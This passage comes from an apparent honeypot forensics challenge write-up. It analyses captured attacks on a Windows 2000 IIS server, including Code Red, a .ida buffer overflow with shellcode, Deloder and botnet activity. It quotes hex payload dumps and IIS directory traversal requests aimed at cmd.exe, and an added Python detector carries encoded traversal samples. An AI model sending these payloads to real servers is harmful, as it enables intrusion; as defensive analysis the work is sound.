0440 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0450 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0460 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0470 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0480 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0490 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
04a0 20
<packet #4>
32889 396969.032378 218.25.147.83 172.16.134.191 HTTP Continuation
(hex is not important for this packet)
The signature of the Code Red worm can be seen at the end of the third packet: the HTML page the worm uses to deface an infected web server, which greets visitors with the following message:
<html><head><meta http-equiv="Content-Type" content="text/html;
charset=english"><title>HELLO!</title></head><bady><hr size=5><font
color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked
By Chinese!</font></hr></bady></html>
210.22.204.101 and 24.197.194.106 attempt to exploit the same .ida ISAPI buffer overflow in IIS, but with a payload of their own rather than the worm's. The following two packets show 210.22.204.101's attack. Notice in the last few lines of the second packet that the payload ends with the string cmd.exe, the Windows command prompt, which is what the shellcode is meant to launch:
<packet #1>
1839 322275.638746 210.22.204.101 172.16.134.191 HTTP GET
/NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
0000 00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00 ..i...........E.
0010 05 dc 6b 08 40 00 6b 06 d7 6c d2 16 cc 65 ac 10 ..k.@.k..l...e..
0020 86 bf 06 8e 00 50 76 16 a7 9e 8b 5a 44 20 50 10 .....Pv....ZD P.
0030 fa f0 f3 19 00 00 47 45 54 20 2f 4e 55 4c 4c 2e ......GET /NULL.
0040 49 44 41 3f 43 43 43 43 43 43 43 43 43 43 43 43 IDA?CCCCCCCCCCCC
0050 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0060 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0070 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0080 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0090 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00a0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00b0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00c0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00d0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00e0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00f0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0100 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0110 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0120 43 43 43 43 43 43 43 43 43 43 43 43 25 75 30 61 CCCCCCCCCCCC%u0a
0130 65 62 25 75 62 38 39 30 25 75 64 61 63 66 25 75 eb%ub890%udacf%u
0140 37 37 65 65 25 75 30 30 30 30 25 75 30 30 30 30 77ee%u0000%u0000
0150 25 75 38 33 38 62 25 75 30 30 39 34 25 75 30 30 %u838b%u0094%u00
0160 30 30 25 75 34 30 38 62 25 75 30 35 36 34 25 75 00%u408b%u0564%u
0170 30 31 35 30 25 75 30 30 30 30 25 75 65 30 66 66 0150%u0000%ue0ff
0180 25 75 39 30 39 30 3d 78 26 90 90 90 90 90 90 90 %u9090=x&.......
0190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
etc...
<packet #2>
1840 322275.638746 210.22.204.101 172.16.134.191 HTTP Continuation
abbreviated hex ...
0250 c9 eb f6 fa d8 fd fd eb fc ea ea 99 ea eb 7f ee ................
0260 a8 e9 7f ee 99 fa 5e f2 f8 26 63 6d 64 2e 65 78 ......^..&cmd.ex
0270 65 24 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 e$ HTTP/1.1..Hos
0280 74 3a 20 31 37 32 2e 31 36 2e 31 33 34 2e 31 39 t: 172.16.134.19
0290 31 3a 38 30 0d 0a 0d 0a 1:80....
24.197.194.106 also attempted to traverse the honeypot's directories through IIS. Here are a few of the HTTP requests it issued:
HEAD /script/..\../..\../..\../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir winnt/system32/cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir /system32/cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir xe?/c+dir HTTP/1.0\n
HEAD /scripts/..%\../..%\../..%\../winnt/system32/cmd.exe?/c+dir winnt/system32/cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/..%\../winnt/system32/cmd.exe?/c+dir xe?/c+dir HTTP/1.0\n
HEAD /scripts/..\../..\../..\winnt/system32/cmd.exe?/c+dir c+dir cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/..\../winnt/system32/cmd.exe?/c+dir r +dir HTTP/1.0\n
HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir +dir HTTP/1.0\n
Notice that the attacker was trying to reach cmd.exe, the Windows command prompt, by escaping the /scripts virtual directory with ../ sequences and various encodings of the backslash. These are the IIS directory traversal bugs (the "Unicode" and double-decode flaws): a server that decodes the path only after checking it will run cmd.exe /c dir, and the attacker can then execute arbitrary commands on the honeypot.
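As an added example (not code from the original writeup), here is detection logic for the three kinds of IIS request shown above: the .ida overflow with Code Red's N padding, the generic .ida overflow with a custom payload, and the directory traversal attempts aimed at cmd.exe. It decodes the path the way a lenient IIS did (twice, and with the overlong UTF-8 forms of / and \), so encoded variants are caught as well as the plain ../ ones. The request lines it runs over are constructed from those quoted in the text plus two encoded variants; the tag names and the 100-character padding threshold are this example's own choices.

```python
"""Classify IIS attack requests: Code Red, .ida overflows and directory traversal.

Added example (not from the original writeup) of the detection logic the
Code Red and directory-traversal sections describe. SAMPLE_REQUESTS is
constructed from the request lines quoted in the text plus two encoded
traversal variants; the tag names and thresholds are this example's own.
"""
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 spellings of '/' and '\' that unpatched IIS decoded after its path check
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\", b"\xc0\x2f": b"/", b"\xc1\x1c": b"\\"}


def normalize_path(path):
    """Decode like a lenient server (twice, for the double-decode bug), map overlong
    sequences and backslashes to '/', then report whether '..' ever climbs above the root."""
    raw = path.encode("latin-1", "replace")
    for _ in range(2):
        raw = unquote_to_bytes(raw)
    for bad, good in OVERLONG.items():
        raw = raw.replace(bad, good)
    text = raw.decode("latin-1").replace("\\", "/").lower()
    depth, escaped = 0, False
    for seg in text.split("/"):
        if seg == "..":
            depth -= 1
            escaped = escaped or depth < 0
        elif seg not in ("", "."):
            depth += 1
    return text, escaped


def classify_request(request_line):
    """Return the set of tags that apply to one HTTP request line."""
    parts = request_line.split()
    if len(parts) < 2:
        return {"malformed"}
    path, _, query = parts[1].partition("?")
    tags = set()
    if re.search(r"\.id[aq]$", path, re.I):
        tags.add("ida-overflow")  # Indexing Service ISAPI (idq.dll) overflow
        if path.lower() == "/default.ida" and re.match(r"[nx]{100,}", query, re.I):
            tags.add("code-red")  # Code Red I pads with N, Code Red II with X
    if path.lower() == "/pagerror.gif":
        tags.add("pagerror-probe")  # the request the text attributes to the Retina Code Red scanner
    norm, escaped = normalize_path(path)
    if escaped:
        tags.add("dir-traversal")
    if "cmd.exe" in norm:
        tags.add("cmd-exe")
    return tags


# Constructed request lines: the ones quoted above plus a Unicode and a double-decode variant.
SAMPLE_REQUESTS = [
    "GET /pagerror.gif HTTP/1.1",
    "GET /default.ida?" + "N" * 224 + "%u9090%u6858%ucbd3%u7801%u9090 HTTP/1.0",
    "GET /NULL.IDA?" + "C" * 240 + "%u0aeb%ub890%udacf%u77ee HTTP/1.1",
    "HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /index.html HTTP/1.0",
]


def classify_all(lines=SAMPLE_REQUESTS):
    """(abbreviated target, sorted tags) for every request line."""
    return [(line.split()[1][:40], sorted(classify_request(line))) for line in lines]


if __name__ == "__main__":
    for target, tags in classify_all():
        print(f"{target:42} {', '.join(tags) or '-'}")
```

Running the same function over the request lines pulled from the capture (Ethereal's http.request.uri column, or the URI field of each GET/HEAD) labels every IIS probe in the log; the decode-then-check order in normalize_path is exactly the mistake the vulnerable server made, which is why it finds the encoded forms.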
Some of the probes against the honeypot resemble a variant of FX-Scanner. That program:
Sends a ping (ICMP)
Accesses port 80 (HTTP)
Accesses port 57 (no service is known for this port)
Accesses port 21 (FTP)
A series of IP addresses, 192.130.71.66, 213.23.49.158, 141.85.37.78 and 203.170.177.8, aroused suspicion that an FX-Scanner-like program was being used. There are no known services on port 57, yet both 192.130.71.66 and 213.23.49.158 sent the honeypot packets on port 57 and port 80. 141.85.37.78 and 203.170.177.8 both sent the honeypot packets attempting to connect to FTP on port 21. The honeypot did not receive a ping. I suspect that all these addresses were coordinated under one attack, but there is no way to know for sure; they may have been isolated incidents.
210.22.204.101 also scans for DameWare Remote Control, whose agent listens on TCP port 6129. It sends the following packet attempting to connect to that port:
2052 322422.446563 210.22.204.101 172.16.134.191 TCP 3870 > 6129 [SYN] Seq=2495283602 Ack=0 Win=64240 Len=0
Many attackers attempted to connect to TCP port 1433 on the honeypot, the Microsoft SQL Server port. The probe looked like this:
43 21871.711441 210.111.56.66 172.16.134.191 TCP 1929 > ms-sql-s [SYN] Seq=786885643 Ack=0 Win=64240 Len=0
These look like scans for exposed SQL Server instances, for example ones with a blank sa password. The SQL Slammer worm, which on Saturday, January 25, 2003 disrupted a large part of the Internet, is a different case: it exploits a buffer overflow in the SQL Server Resolution Service with a single UDP datagram to port 1434, and an infected host then sprays copies of that datagram at random addresses. TCP SYNs to 1433 are therefore not Slammer traffic, although the worm's outbreak a few months earlier explains the continued interest in SQL Server hosts.
rpc.statd Vulnerability
A few attackers attempted to connect to TCP port 111 on the honeypot, the sunrpc portmapper, which is queried to find the port rpc.statd is listening on. rpc.statd has an input validation flaw (a format string bug, CERT advisory CA-2000-17) that lets a remote attacker run code as root. It is installed by default on many Linux distributions, so these scans were looking for a Linux host; the honeypot runs Windows 2000. This is what the packet looked like:
246 146489.407148 204.50.186.37 172.16.134.191 TCP 4069 > sunrpc [SYN] Seq=2674258792 Ack=0 Win=32120 Len=0
A few attackers sent the honeypot UDP packets to port 28431, the port used by the Hack'a'Tack remote-access trojan, whose server gives the attacker remote control of the machine together with a keylogger, an IP scanner and password stealing. These packets are probes for a machine that is already infected rather than an attack in themselves. This is what the packet looked like:
10 6750.116690 62.150.170.134 172.16.134.191 UDP Source port: 28432 Destination port: 28431
SOCKS Vulnerability
A few attackers attempted to connect to TCP port 1080 on the honeypot, looking for a SOCKS proxy. An open proxy lets an attacker bounce connections through it and attack a third party while the packets appear to come from the proxy host rather than from the attacker. This is what the packet looked like:
162 98205.654304 200.74.26.73 172.16.134.191 TCP 25590 > 1080 [SYN] Seq=410779648 Ack=0 Win=512 Len=0
Who Did What? A list of attempted attacks
Windows 2000 NetBIOS vulnerabilities.
The following IP source addresses accessed ports 137, 139 or 445 in an attempt to exploit NetBIOS and SMB:
129.116.182.239
141.149.155.249
144.134.109.25
148.235.82.146
162.33.189.252
164.125.76.48
168.226.98.61
169.254.205.177
172.168.0.154
195.36.247.77
195.67.251.197
200.60.202.74
200.66.98.107
200.78.103.67
202.63.162.34
203.106.55.12
203.115.96.146
207.6.77.235
208.186.61.2
209.45.125.69
209.45.125.110
210.12.211.121
210.203.189.77
210.214.49.227
210.58.0.25
211.149.57.197
212.110.30.110
213.107.105.72
213.116.166.126
213.217.55.243
213.44.104.92
213.7.60.57
213.84.75.42
216.170.214.226
216.228.8.158
217.1.35.169
217.222.201.82
217.227.245.101
217.227.98.82
218.163.9.89
218.237.70.119
218.87.178.167
219.118.31.42
219.65.37.37
219.94.46.57
24.107.117.237
24.161.196.103
4.64.221.42
61.11.11.54
61.111.101.78
61.14.66.92
61.140.149.137
61.155.126.150
61.177.154.228
61.55.71.169
62.127.38.198
62.194.4.114
62.201.96.159
62.251.129.118
64.17.250.240
64.254.203.68
66.139.10.15
66.190.67.122
66.73.160.240
66.8.163.125
66.92.135.108
68.115.33.110
68.152.53.138
68.154.11.82
80.181.116.202
81.114.77.37
81.202.125.5
81.50.177.167
210.22.204.101
24.197.194.106
W32.HLLW.Deloder Worm: 61.111.101.78
Code Red Worm:
Retina
CodeRed Scanner: 68.169.174.108
Code Red Worm: 218.25.147.83
Other IIS Buffer Overflows:
24.197.194.106
210.22.204.101
Directory Traversing Vulnerability:
24.197.194.106
FX-Scanner:
Accessed FTP: 141.85.37.78 and 203.170.177.8
Accessed port 57 and HTTP: 192.130.71.66 and 213.23.49.158
DameWare Remote Control Agent Vulnerability
210.22.204.101
Microsoft SQL Server Vulnerability
12.252.61.161
12.253.142.87
12.83.147.97
168.243.103.205
192.215.160.106
194.199.201.9
200.135.228.10
200.50.124.2
205.180.159.35
206.149.148.192
210.111.56.66
212.122.20.74
212.162.165.18
213.122.77.74
213.170.56.83
216.192.145.21
216.229.73.11
217.35.65.9
218.244.66.32
218.4.48.74
218.4.65.115
218.4.87.137
218.4.99.237
218.92.13.142
219.145.211.132
219.145.211.3
24.167.221.106
24.74.199.104
4.33.244.44
61.132.88.50
61.132.88.90
61.134.45.19
61.150.120.72
61.150.72.7
61.177.56.98
61.177.62.66
61.185.212.166
61.185.215.42
61.185.242.190
61.185.29.9
61.203.104.148
61.8.1.64
66.233.4.225
66.81.131.17
67.201.75.38
67.81.161.166
68.37.54.69
68.45.123.130
68.84.210.227
81.57.217.208
rpc.statd Vulnerability
204.50.186.37
212.243.23.179
Hack'a'Tack
62.150.170.134
62.150.170.232
SOCKS Vulnerability
200.74.26.73
3. Which attacks were successful?
Those attackers that attempted to map the C drive over the NetBIOS session service (port 139) were unsuccessful:
8 0.514274 219.118.31.42 172.16.134.191 SMB Tree Connect AndX Request, Path: \\PC0191\C
9 0.517180 172.16.134.191 219.118.31.42 TCP netbios-ssn > 2388 [RST] Seq=2476847245 Ack=1943715703 Win=0 Len=0
In packet #9 the honeypot answered with a TCP reset (the RST flag set), so the session was torn down and the share was never mapped. A plain share named C is what older, share-level versions of Windows expose; on Windows 2000 the attacker has to connect to the IPC$ share (or the administrative share C$) instead, like this:
925 322205.478544 210.22.204.101 172.16.134.191 SMB Tree Connect AndX Request, Path: \\172.16.134.191\IPC$
294 236849.783405 172.16.134.191 195.36.247.77 SMB Tree Connect AndX Response
All the attackers that connected to the honeypot through the IPC$ share were successful: the server answered their Tree Connect AndX Request with a Tree Connect AndX Response. They logged in to the Administrator account using the NULL password. (A tree connect to IPC$ on its own does not show which account was used, since Windows 2000 also accepts anonymous null sessions to IPC$; the account is in the Session Setup AndX Request that precedes it.)
W32.HLLW.Deloder Worm
61.111.101.78 succeeded in exploiting the honeypot with the Deloder worm. As described in the Vulnerabilities section, the worm logged in through the IPC$ share and installed the PSEXESVC.EXE and INST.EXE files. Right after 61.111.101.78 finished communicating with the honeypot, the honeypot began attempting to log on to IRC servers, like so:
34821 412112.717027 172.16.134.191 209.126.161.29 TCP 1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0
35739 412630.079021 172.16.134.191 66.33.65.58 TCP 1129 > 6667 [SYN] Seq=3523948626 Ack=0 Win=16384 Len=0
35745 413286.204510 172.16.134.191 63.241.174.144 TCP 1133 > 6667 [SYN] Seq=3688527302 Ack=0 Win=16384 Len=0
35762 413307.053048 172.16.134.191 217.199.175.10 TCP 1139 > 6667 [SYN] Seq=3694305514 Ack=0 Win=16384 Len=0
35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0
This tells us that 61.111.101.78 successfully exploited the honeypot and ran code on it that told it to connect to an IRC server and await commands. The honeypot succeeded in logging in to the IRC server 209.196.44.172. This channel is a botnet that interacted with at least 6639 distinct hosts while the honeypot was logged in. A little while after the honeypot joined the botnet, it received an order to send the following packets:
39390 418489.571532 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0
39394 418492.509669 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0
39397 418498.652595 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0
These packets were directed at 199.107.7.2 on TCP port 31337, the port that Back Orifice and a number of other Trojans listen on, so the honeypot was most likely told to check that host for a backdoor. It received no response from 199.107.7.2: the three SYNs carry the same sequence number a few seconds apart, which means they are TCP retransmissions of a single unanswered connection attempt.
Code Red Worm
After 218.25.147.83 launched the Code Red attack on the honeypot, it no longer interacted with the honeypot. Since the honeypot did not go on to send Code Red requests to other machines, I assume the attack was unsuccessful.
Other IIS Buffer Overflows
24.197.194.106 attempted a buffer overflow similar to the one described in the Vulnerabilities section. However, it was unable to exploit the honeypot.
It appears that the buffer overflow attempted by 210.22.204.101 was successful. Right after the overflow, 210.22.204.101 was able to connect to the honeypot on TCP port 4899, the port of Remote Administrator (Radmin), a tool for controlling a computer remotely that technical support staff often use to help someone fix their machine. 210.22.204.101 then used the Remote Administrator session to have the honeypot fetch two tools from the web: ZipCentral (zcsetup.exe) and Foundstone's Fport (fport.zip). ZipCentral is presumably there to unzip Fport, a legitimate utility that lists the open ports on a host and the process behind each one. The file requests appear below:
18726 332245.693463 172.16.134.191 217.151.192.231 HTTP GET /users/z/zcentral/zcsetup.exe HTTP/1.1
20815 335390.704047 172.16.134.191 216.154.242.126 HTTP GET /knowledge/zips/fport.zip HTTP/1.1
The downloads succeeded. Most likely the attacker intends to use the honeypot to scan and attack other computers at a later date, and has probably left a backdoor on it; the Remote Administrator service listening on port 4899 may itself be that backdoor.
Directory Traversing Vulnerability
24.197.194.106 attempted to exploit the honeypot's IIS using directory traversal. There is no reason to believe that it succeeded.
FX-Scanner
The scans were successful in that the honeypot answered them, but the honeypot was not harmed.
DameWare Remote Control Agent Vulnerability
DameWare Remote Control Agent was not running on the honeypot and port 6129 was not open, so an attack was unsuccessful.
Microsoft SQL Server Vulnerability
Microsoft SQL Server was not running on the honeypot and port 1433 was not open, so an attack was unsuccessful.
rpc.statd Vulnerability
The honeypot is a Windows 2000 machine with no RPC portmapper or rpc.statd; port 111 was not open, so an attack was unsuccessful.
Hack'a'Tack
The Hack'a'Tack probes found nothing listening on UDP port 28431 and were unsuccessful.
SOCKS Vulnerability
No SOCKS proxy was running on the honeypot and port 1080 was not open, so an attack was unsuccessful.
1. What did you learn about analysis as a result of studying this scan?
I learned how to use Ethereal and Snort for the first time. I discovered how many different attacks are out there and how vulnerable Windows 2000 is. My fundamental understanding of packet-based networking has improved.
2. How do you anticipate being able to apply your new knowledge and skills?
First of all, I will update my own Windows 2000 system. I feel that upon graduating from college, I will be able to put these new skills to use in my profession.
3. How can we improve the SotM challenge? What would you like to see added? What would you like to see done differently?
No complaints.
Sources and Useful Links:
A Short IRC Primer: http://www.irchelp.org/irchelp/ircprimer.html
Just What is a Botnet? http://zine.dal.net/previousissues/issue22/botnet.php
Ports List: http://www.neohapsis.com/neolabs/neo-ports/neo-ports.html
Buffer Overflow in IIS info: http://www.eeye.com/html/Research/Advisories/AD20010618.html
Deloder Worm Analysis: http://www.klcconsulting.net/deloder_worm.htm
Input Validation Problem in rpc.statd: http://www.cert.org/advisories/CA-2000-17.html
Firewall Forensics: http://www.robertgraham.com/pubs/firewall-seen.html
"Code Red" Worm Exploiting Buffer Overflow In IIS: http://www.cert.org/advisories/CA-2001-19.html
TCP 6129 - Dameware: http://lists.insecure.org/lists/incidents/2002/Aug/0107.html